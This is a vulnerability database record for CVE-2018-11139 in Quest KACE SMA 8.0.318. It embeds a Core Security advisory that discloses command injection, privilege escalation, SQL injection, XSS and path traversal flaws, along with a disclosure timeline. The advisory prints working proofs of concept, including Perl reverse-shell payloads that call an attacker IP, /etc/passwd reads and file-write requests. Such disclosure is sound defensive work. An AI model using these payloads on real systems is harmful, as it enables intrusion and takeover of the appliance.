"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11139",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10908",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11139",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11139",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-10908",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1215",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11139",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027/common/ajax_email_connection_test.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the script via the POST method. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11139",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10908",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11139",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "VULMON",
"id": "CVE-2018-11139"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"id": "VAR-201805-0599",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
}
]
},
"last_update_date": "2023-12-18T12:01:57.646000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance command to inject vulnerability patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131205"
},
{
"title": "Quest KACE System Management Appliance Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81227"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
